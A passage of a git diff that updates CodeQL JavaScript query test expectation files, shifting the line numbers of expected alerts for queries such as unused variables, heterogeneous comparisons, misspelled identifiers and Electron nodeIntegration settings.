parameter_field.ts:6:15:6:15 | x | The parameter 'x' is never used. | | tst2.js:1:12:1:12 | x | The parameter 'x' is never used. | -| tst2.js:29:12:29:12 | x | The parameter 'x' is never used. | -| tst.js:7:32:7:34 | idx | The parameter 'idx' is never used. | -| tst.js:12:13:12:13 | x | The parameter 'x' is never used. | +| tst2.js:28:12:28:12 | x | The parameter 'x' is never used. | +| tst.js:6:32:6:34 | idx | The parameter 'idx' is never used. | +| tst.js:10:13:10:13 | x | The parameter 'x' is never used. | diff --git a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected index 73be1f62b893..a188fe34545d 100644 --- a/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected +++ b/javascript/ql/test/query-tests/Declarations/UnusedVariable/UnusedVariable.expected @@ -3,7 +3,7 @@ | decorated.ts:4:10:4:12 | fun | Unused function fun. | | eval.js:10:9:10:24 | not_used_by_eval | Unused variable not_used_by_eval. | | eval.js:19:9:19:24 | not_used_by_eval | Unused variable not_used_by_eval. | -| externs.js:6:5:6:13 | iAmUnused | Unused variable iAmUnused. | +| externs.js:5:5:5:13 | iAmUnused | Unused variable iAmUnused. | | importWithoutPragma.jsx:1:1:1:27 | import ... react'; | Unused import h. | | interTypes.ts:1:1:1:37 | import ... where"; | Unused import Bar. | | multi-imports.js:1:1:1:29 | import ... om 'x'; | Unused imports a, b, d. | diff --git a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected index 674fd74caee2..e94b40e1c1df 100644 --- a/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected +++ b/javascript/ql/test/query-tests/Electron/NodeIntegration/EnablingNodeIntegration.expected @@ -1,5 +1,5 @@ | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegrationInWorker` feature has been enabled. | | EnablingNodeIntegration.js:5:28:11:9 | {\\n ... } | The `nodeIntegration` feature has been enabled. | | EnablingNodeIntegration.js:15:22:20:9 | {\\n ... } | The `nodeIntegration` feature is enabled by default. | -| EnablingNodeIntegration.js:23:16:27:9 | { // NO ... } | The `nodeIntegration` feature is enabled by default. | +| EnablingNodeIntegration.js:23:16:27:9 | { // $ ... } | The `nodeIntegration` feature is enabled by default. | | EnablingNodeIntegration.js:49:74:49:96 | {nodeIn ... : true} | The `nodeIntegration` feature has been enabled. | diff --git a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected index c82afd5c4cae..6ac9592a1bd2 100644 --- a/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected +++ b/javascript/ql/test/query-tests/Expressions/BitwiseSignCheck/BitwiseSignCheck.expected @@ -1,3 +1,3 @@ | tst.js:2:9:2:24 | (x & (1< 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:14:13:14:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | -| tst.js:23:1:23:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:13:13:13:25 | (x >>> 0) > 0 | Potentially unsafe sign check of a bitwise operation. | +| tst.js:21:1:21:21 | (x & 0x ... 00) > 0 | Potentially unsafe sign check of a bitwise operation. | diff --git a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected index 371b6251b87c..ae3d98f8f143 100644 --- a/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected +++ b/javascript/ql/test/query-tests/Expressions/CompareIdenticalValues/CompareIdenticalValues.expected @@ -1,2 +1,2 @@ | tst.js:11:10:11:15 | y <= y | This expression compares $@ to itself. | tst.js:11:10:11:10 | y | y | -| tst.js:22:1:22:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:22:1:22:16 | (function() { }) | (function() { }) | +| tst.js:21:1:21:35 | (functi ... n() {}) | This expression compares $@ to itself. | tst.js:21:1:21:16 | (function() { }) | (function() { }) | diff --git a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected index 52517a4503e6..1f4a398b2af4 100644 --- a/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected +++ b/javascript/ql/test/query-tests/Expressions/ExprHasNoEffect/ExprHasNoEffect.expected @@ -1,14 +1,14 @@ | try.js:22:9:22:26 | x.ordinaryProperty | This expression has no effect. | -| tst2.js:3:4:3:4 | 0 | This expression has no effect. | +| tst2.js:2:4:2:4 | 0 | This expression has no effect. | | tst.js:3:1:3:2 | 23 | This expression has no effect. | | tst.js:5:1:5:2 | 23 | This expression has no effect. | | tst.js:7:6:7:7 | 23 | This expression has no effect. | | tst.js:9:1:9:1 | 1 | This expression has no effect. | -| tst.js:23:1:23:1 | x | This expression has no effect. | -| tst.js:43:5:43:9 | "foo" | This expression has no effect. | -| tst.js:49:3:49:26 | new Err ... ou so") | This expression has no effect. | -| tst.js:50:3:50:49 | new Syn ... o me?") | This expression has no effect. | -| tst.js:51:3:51:36 | new Err ... age(e)) | This expression has no effect. | -| tst.js:62:2:62:20 | o.trivialNonGetter1 | This expression has no effect. | -| tst.js:78:24:78:24 | o | This expression has no effect. | +| tst.js:22:1:22:1 | x | This expression has no effect. | +| tst.js:42:5:42:9 | "foo" | This expression has no effect. | +| tst.js:48:3:48:26 | new Err ... ou so") | This expression has no effect. | +| tst.js:49:3:49:49 | new Syn ... o me?") | This expression has no effect. | +| tst.js:50:3:50:36 | new Err ... age(e)) | This expression has no effect. | +| tst.js:61:2:61:20 | o.trivialNonGetter1 | This expression has no effect. | +| tst.js:77:24:77:24 | o | This expression has no effect. | | uselessfn.js:1:1:1:15 | (functi ... .");\\n}) | This expression has no effect. | diff --git a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected index 62637a0bb38a..12142d56507f 100644 --- a/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected +++ b/javascript/ql/test/query-tests/Expressions/HeterogeneousComparison/HeterogeneousComparison.expected @@ -1,53 +1,53 @@ | interprocedural.js:11:9:11:13 | known | Variable 'known' is of type string, but it is compared to $@ of type number. | interprocedural.js:11:19:11:20 | 42 | an expression | | interprocedural.js:15:9:15:18 | getKnown() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:15:24:15:25 | 42 | an expression | | interprocedural.js:17:9:17:27 | getKnown_indirect() | This expression is of type string, but it is compared to $@ of type number. | interprocedural.js:17:33:17:34 | 42 | an expression | -| tst.js:2:5:2:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:2:23:2:31 | undefined | 'undefined' | -| tst.js:10:28:10:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:10:39:10:39 | 0 | an expression | -| tst.js:20:1:20:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:20:9:20:9 | 0 | an expression | -| tst.js:24:6:24:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:23:9:23:12 | "hi" | an expression | -| tst.js:28:1:28:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:28:28:28:36 | undefined | 'undefined' | -| tst.js:31:1:31:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:31:34:31:42 | undefined | 'undefined' | -| tst.js:34:5:34:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:34:24:34:34 | 'undefined' | an expression | -| tst.js:48:3:48:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:48:13:48:18 | "zero" | an expression | -| tst.js:52:1:52:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. | tst.js:52:5:52:43 | (Math.r ... [1, 2]) | an expression | -| tst.js:88:31:88:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:88:38:88:41 | null | an expression | -| tst.js:91:35:91:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:91:42:91:45 | null | an expression | -| tst.js:101:5:101:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:101:12:101:15 | null | an expression | -| tst.js:104:9:104:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:104:16:104:19 | null | an expression | -| tst.js:110:5:110:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:110:9:110:13 | "def" | an expression | -| tst.js:117:5:117:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:117:9:117:13 | "def" | an expression | -| tst.js:131:5:131:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:131:13:131:14 | 42 | an expression | -| tst.js:134:5:134:8 | true | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:134:13:134:17 | "bar" | an expression | -| tst.js:142:5:142:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:142:11:142:14 | "42" | an expression | -| tst.js:143:5:143:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:143:12:143:12 | b | variable 'b' | -| tst.js:144:5:144:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:144:11:144:11 | b | variable 'b' | -| tst.js:148:5:148:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:148:15:148:23 | undefined | 'undefined' | -| tst.js:149:5:149:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:149:19:149:23 | "foo" | an expression | -| tst.js:151:5:151:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:151:13:151:17 | "foo" | an expression | -| tst.js:153:5:153:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:153:18:153:22 | "foo" | an expression | -| tst.js:160:5:160:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:160:12:160:15 | null | an expression | -| tst.js:161:5:161:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:161:14:161:15 | t1 | variable 't1' | -| tst.js:164:5:164:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:164:12:164:15 | null | an expression | -| tst.js:165:5:165:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:165:14:165:15 | t2 | variable 't2' | -| tst.js:168:5:168:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. | tst.js:168:12:168:15 | null | an expression | -| tst.js:169:5:169:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:169:14:169:15 | t3 | variable 't3' | -| tst.js:172:5:172:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:172:12:172:15 | null | an expression | -| tst.js:173:5:173:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:173:14:173:15 | t4 | variable 't4' | -| tst.js:176:5:176:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. | tst.js:176:12:176:15 | null | an expression | -| tst.js:177:5:177:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:177:14:177:15 | t5 | variable 't5' | -| tst.js:180:5:180:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:180:12:180:15 | null | an expression | -| tst.js:181:5:181:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:181:14:181:15 | t6 | variable 't6' | -| tst.js:184:5:184:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:184:12:184:15 | null | an expression | -| tst.js:185:5:185:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:185:14:185:15 | t7 | variable 't7' | -| tst.js:188:5:188:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:188:12:188:15 | null | an expression | -| tst.js:189:5:189:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:189:14:189:15 | t8 | variable 't8' | -| tst.js:202:5:202:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:202:12:202:13 | t4 | variable 't4' | -| tst.js:203:5:203:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:203:12:203:13 | t2 | variable 't2' | -| tst.js:204:5:204:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:204:12:204:13 | t4 | variable 't4' | -| tst.js:205:5:205:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:205:12:205:13 | t3 | variable 't3' | -| tst.js:207:5:207:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:207:12:207:13 | t5 | variable 't5' | -| tst.js:208:5:208:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:208:12:208:13 | t2 | variable 't2' | -| tst.js:209:5:209:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:209:12:209:13 | t5 | variable 't5' | -| tst.js:210:5:210:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:210:12:210:13 | t3 | variable 't3' | -| tst.js:225:13:225:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:225:20:225:24 | "foo" | an expression | -| tst.js:233:5:233:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. | tst.js:233:11:233:12 | 42 | an expression | +| tst.js:1:5:1:17 | typeof window | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:1:23:1:31 | undefined | 'undefined' | +| tst.js:8:28:8:34 | "Hello" | This expression is of type string, but it is compared to $@ of type number. | tst.js:8:39:8:39 | 0 | an expression | +| tst.js:17:1:17:4 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:17:9:17:9 | 0 | an expression | +| tst.js:20:6:20:7 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:19:9:19:12 | "hi" | an expression | +| tst.js:23:1:23:23 | Object. ... ) + "!" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:23:28:23:36 | undefined | 'undefined' | +| tst.js:25:1:25:29 | (+f() \| ... + k())) | This expression is of type boolean, number or string, but it is compared to $@ of type undefined. | tst.js:25:34:25:42 | undefined | 'undefined' | +| tst.js:27:5:27:19 | !Module['load'] | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:27:24:27:34 | 'undefined' | an expression | +| tst.js:41:3:41:8 | number | Variable 'number' is of type number, but it is compared to $@ of type string. | tst.js:41:13:41:18 | "zero" | an expression | +| tst.js:44:1:44:1 | 0 | This expression is of type number, but it is compared to $@ of type object or undefined. | tst.js:44:5:44:43 | (Math.r ... [1, 2]) | an expression | +| tst.js:79:31:79:32 | x2 | Variable 'x2' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:79:38:79:41 | null | an expression | +| tst.js:82:35:82:36 | x3 | Variable 'x3' is of type date, object or regular expression, but it is compared to $@ of type null. | tst.js:82:42:82:45 | null | an expression | +| tst.js:92:5:92:6 | x5 | Variable 'x5' cannot be of type null, but it is compared to $@ of type null. | tst.js:92:12:92:15 | null | an expression | +| tst.js:95:9:95:10 | x6 | Variable 'x6' cannot be of type null, but it is compared to $@ of type null. | tst.js:95:16:95:19 | null | an expression | +| tst.js:101:5:101:5 | o | Variable 'o' is of type object, but it is compared to $@ of type string. | tst.js:101:9:101:13 | "def" | an expression | +| tst.js:108:5:108:5 | a | Variable 'a' is of type object, but it is compared to $@ of type string. | tst.js:108:9:108:13 | "def" | an expression | +| tst.js:122:5:122:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:122:13:122:14 | 42 | an expression | +| tst.js:125:5:125:8 | true | This expression is of type boolean, but it is compared to $@ of type string. | tst.js:125:13:125:17 | "bar" | an expression | +| tst.js:133:5:133:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:133:11:133:14 | "42" | an expression | +| tst.js:134:5:134:6 | 42 | This expression is of type number, but it is compared to $@ of type string. | tst.js:134:12:134:12 | b | variable 'b' | +| tst.js:135:5:135:5 | a | Variable 'a' is of type number, but it is compared to $@ of type string. | tst.js:135:11:135:11 | b | variable 'b' | +| tst.js:139:5:139:9 | "foo" | This expression is of type string, but it is compared to $@ of type undefined. | tst.js:139:15:139:23 | undefined | 'undefined' | +| tst.js:140:5:140:13 | undefined | 'undefined' is of type undefined, but it is compared to $@ of type string. | tst.js:140:19:140:23 | "foo" | an expression | +| tst.js:142:5:142:7 | NaN | 'NaN' is of type number, but it is compared to $@ of type string. | tst.js:142:13:142:17 | "foo" | an expression | +| tst.js:144:5:144:12 | Infinity | 'Infinity' is of type number, but it is compared to $@ of type string. | tst.js:144:18:144:22 | "foo" | an expression | +| tst.js:151:5:151:6 | t1 | Variable 't1' is of type number, but it is compared to $@ of type null. | tst.js:151:12:151:15 | null | an expression | +| tst.js:152:5:152:8 | null | This expression is of type null, but it is compared to $@ of type number. | tst.js:152:14:152:15 | t1 | variable 't1' | +| tst.js:155:5:155:6 | t2 | Variable 't2' is of type number or string, but it is compared to $@ of type null. | tst.js:155:12:155:15 | null | an expression | +| tst.js:156:5:156:8 | null | This expression is of type null, but it is compared to $@ of type number or string. | tst.js:156:14:156:15 | t2 | variable 't2' | +| tst.js:159:5:159:6 | t3 | Variable 't3' is of type number, string or undefined, but it is compared to $@ of type null. | tst.js:159:12:159:15 | null | an expression | +| tst.js:160:5:160:8 | null | This expression is of type null, but it is compared to $@ of type number, string or undefined. | tst.js:160:14:160:15 | t3 | variable 't3' | +| tst.js:163:5:163:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type null. | tst.js:163:12:163:15 | null | an expression | +| tst.js:164:5:164:8 | null | This expression is of type null, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:164:14:164:15 | t4 | variable 't4' | +| tst.js:167:5:167:6 | t5 | Variable 't5' cannot be of type null, but it is compared to $@ of type null. | tst.js:167:12:167:15 | null | an expression | +| tst.js:168:5:168:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:168:14:168:15 | t5 | variable 't5' | +| tst.js:171:5:171:6 | t6 | Variable 't6' cannot be of type null, but it is compared to $@ of type null. | tst.js:171:12:171:15 | null | an expression | +| tst.js:172:5:172:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:172:14:172:15 | t6 | variable 't6' | +| tst.js:175:5:175:6 | t7 | Variable 't7' cannot be of type null, but it is compared to $@ of type null. | tst.js:175:12:175:15 | null | an expression | +| tst.js:176:5:176:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:176:14:176:15 | t7 | variable 't7' | +| tst.js:179:5:179:6 | t8 | Variable 't8' cannot be of type null, but it is compared to $@ of type null. | tst.js:179:12:179:15 | null | an expression | +| tst.js:180:5:180:8 | null | This expression is of type null, but it is compared to $@ , which cannot be of type null. | tst.js:180:14:180:15 | t8 | variable 't8' | +| tst.js:193:5:193:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:193:12:193:13 | t4 | variable 't4' | +| tst.js:194:5:194:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function or regular expression. | tst.js:194:12:194:13 | t2 | variable 't2' | +| tst.js:195:5:195:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, number, string or undefined. | tst.js:195:12:195:13 | t4 | variable 't4' | +| tst.js:196:5:196:6 | t4 | Variable 't4' is of type boolean, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:196:12:196:13 | t3 | variable 't3' | +| tst.js:198:5:198:6 | t2 | Variable 't2' is of type function or regular expression, but it is compared to $@ , which cannot be of type function or regular expression. | tst.js:198:12:198:13 | t5 | variable 't5' | +| tst.js:199:5:199:6 | t5 | Variable 't5' cannot be of type function or regular expression, but it is compared to $@ of type function or regular expression. | tst.js:199:12:199:13 | t2 | variable 't2' | +| tst.js:200:5:200:6 | t3 | Variable 't3' is of type function, object or regular expression, but it is compared to $@ of type boolean, null, number, string or undefined. | tst.js:200:12:200:13 | t5 | variable 't5' | +| tst.js:201:5:201:6 | t5 | Variable 't5' is of type boolean, null, number, string or undefined, but it is compared to $@ of type function, object or regular expression. | tst.js:201:12:201:13 | t3 | variable 't3' | +| tst.js:216:13:216:14 | xy | Variable 'xy' is of type undefined, but it is compared to $@ of type string. | tst.js:216:20:216:24 | "foo" | an expression | +| tst.js:224:5:224:5 | x | Variable 'x' is of type object, but it is compared to $@ of type number. | tst.js:224:11:224:12 | 42 | an expression | diff --git a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected index 3168aa8b1a0b..51a9ebb1f0a3 100644 --- a/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected +++ b/javascript/ql/test/query-tests/Expressions/ImplicitOperandConversion/ImplicitOperandConversion.expected @@ -1,17 +1,17 @@ -| tst.js:2:1:2:7 | !method | This expression will be implicitly converted from boolean to string. | -| tst.js:17:6:17:9 | null | This expression will be implicitly converted from null to object. | -| tst.js:20:6:20:13 | 'string' | This expression will be implicitly converted from string to object. | -| tst.js:26:13:26:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. | -| tst.js:29:18:29:26 | !callback | This expression will be implicitly converted from boolean to object. | -| tst.js:53:5:53:10 | void 0 | This expression will be implicitly converted from undefined to number. | -| tst.js:61:3:61:3 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:67:8:67:8 | y | This expression will be implicitly converted from undefined to number. | -| tst.js:73:5:73:5 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:79:19:79:22 | name | This expression will be implicitly converted from undefined to string. | -| tst.js:85:3:85:3 | x | This expression will be implicitly converted from undefined to number. | -| tst.js:100:5:100:7 | f() | This expression will be implicitly converted from undefined to number. | -| tst.js:106:5:106:7 | g() | This expression will be implicitly converted from undefined to number. | -| tst.js:109:13:109:15 | g() | This expression will be implicitly converted from undefined to number. | -| tst.js:110:13:110:15 | g() | This expression will be implicitly converted from undefined to string. | -| tst.js:117:8:117:8 | y | This expression will be implicitly converted from string to number. | -| tst.js:122:10:122:10 | y | This expression will be implicitly converted from string to number. | +| tst.js:1:1:1:7 | !method | This expression will be implicitly converted from boolean to string. | +| tst.js:15:6:15:9 | null | This expression will be implicitly converted from null to object. | +| tst.js:17:6:17:13 | 'string' | This expression will be implicitly converted from string to object. | +| tst.js:22:13:22:53 | "Settin ... o '%s'" | This expression will be implicitly converted from string to number. | +| tst.js:24:18:24:26 | !callback | This expression will be implicitly converted from boolean to object. | +| tst.js:47:5:47:10 | void 0 | This expression will be implicitly converted from undefined to number. | +| tst.js:54:3:54:3 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:59:8:59:8 | y | This expression will be implicitly converted from undefined to number. | +| tst.js:64:5:64:5 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:69:19:69:22 | name | This expression will be implicitly converted from undefined to string. | +| tst.js:74:3:74:3 | x | This expression will be implicitly converted from undefined to number. | +| tst.js:89:5:89:7 | f() | This expression will be implicitly converted from undefined to number. | +| tst.js:95:5:95:7 | g() | This expression will be implicitly converted from undefined to number. | +| tst.js:98:13:98:15 | g() | This expression will be implicitly converted from undefined to number. | +| tst.js:99:13:99:15 | g() | This expression will be implicitly converted from undefined to string. | +| tst.js:106:8:106:8 | y | This expression will be implicitly converted from string to number. | +| tst.js:111:10:111:10 | y | This expression will be implicitly converted from string to number. | diff --git a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected index 1bf8599b8be5..05bc8f28ad14 100644 --- a/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected +++ b/javascript/ql/test/query-tests/Expressions/MisspelledIdentifier/MisspelledIdentifier.expected @@ -1,6 +1,6 @@ -| tst.js:5:19:5:24 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:26:5:26:10 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:26:16:26:21 | lenght | 'lenght' may be a typo for 'length'. | -| tst.js:32:27:32:34 | avalable | 'avalable' may be a typo for 'available'. | -| tst.js:42:5:42:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. | -| tst.js:43:5:43:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. | +| tst.js:4:19:4:24 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:24:5:24:10 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:24:16:24:21 | lenght | 'lenght' may be a typo for 'length'. | +| tst.js:29:27:29:34 | avalable | 'avalable' may be a typo for 'available'. | +| tst.js:39:5:39:12 | throught | 'throught' may be a typo for 'through' or 'throughout'. | +| tst.js:40:5:40:9 | sheat | 'sheat' may be a typo for 'cheat', 'sheath' or 'sheet'. | diff --git a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected index e97b3e8fe783..fcdf350a9268 100644 --- a/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected +++ b/javascript/ql/test/query-tests/Expressions/SelfAssignment/SelfAssignment.expected @@ -1,5 +1,5 @@ | jsdoc.js:9:5:9:19 | this.y = this.y | This expression assigns property y to itself. | | jsdoc.js:11:5:11:23 | this.arg = this.arg | This expression assigns property arg to itself. | -| tst.js:5:2:5:14 | width = width | This expression assigns variable width to itself. | -| tst.js:24:1:24:19 | array[1] = array[1] | This expression assigns element 1 to itself. | -| tst.js:27:1:27:9 | o.x = o.x | This expression assigns property x to itself. | +| tst.js:4:2:4:14 | width = width | This expression assigns variable width to itself. | +| tst.js:22:1:22:19 | array[1] = array[1] | This expression assigns element 1 to itself. | +| tst.js:24:1:24:9 | o.x = o.x | This expression assigns property x to itself. | diff --git a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected index 990eaa36148f..1ce095b51938 100644 --- a/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected +++ b/javascript/ql/test/query-tests/Expressions/SuspiciousInvocation/SuspiciousInvocation.expected @@ -2,5 +2,5 @@ | namespace.ts:23:1:23:3 | g() | Callee is not a function: it has type object. | | optional-chaining.js:3:5:3:7 | a() | Callee is not a function: it has type null. | | optional-chaining.js:7:5:7:7 | b() | Callee is not a function: it has type undefined. | -| super.js:11:5:11:11 | super() | Callee is not a function: it has type number. | +| super.js:10:5:10:11 | super() | Callee is not a function: it has type number. | | unreachable-code.js:5:9:5:11 | f() | Callee is not a function: it has type undefined. | diff --git a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected index 81cd1fac8fd5..82d959bca090 100644 --- a/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected +++ b/javascript/ql/test/query-tests/Expressions/WhitespaceContradictsPrecedence/WhitespaceContradictsPrecedence.expected @@ -1,3 +1,3 @@ | tst.js:2:9:2:16 | x + x>>1 | Whitespace around nested operators contradicts precedence. | | tst.js:42:9:42:20 | p in o&&o[p] | Whitespace around nested operators contradicts precedence. | -| tst.js:49:1:49:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. | +| tst.js:48:1:48:12 | x + x >> 1 | Whitespace around nested operators contradicts precedence. | diff --git a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected index 6b028267ff76..4ed958a048a1 100644 --- a/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected +++ b/javascript/ql/test/query-tests/JSDoc/UndocumentedParameter/UndocumentedParameter.expected @@ -1,2 +1,2 @@ -| tst.js:6:15:6:15 | y | Parameter y is not documented. | -| tst.js:26:19:26:19 | y | Parameter y is not documented. | +| tst.js:4:15:4:15 | y | Parameter y is not documented. | +| tst.js:23:19:23:19 | y | Parameter y is not documented. | diff --git a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected index bffe622dc7e0..7be415438250 100644 --- a/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected +++ b/javascript/ql/test/query-tests/LanguageFeatures/BadTypeof/BadTypeof.expected @@ -1,3 +1,3 @@ -| 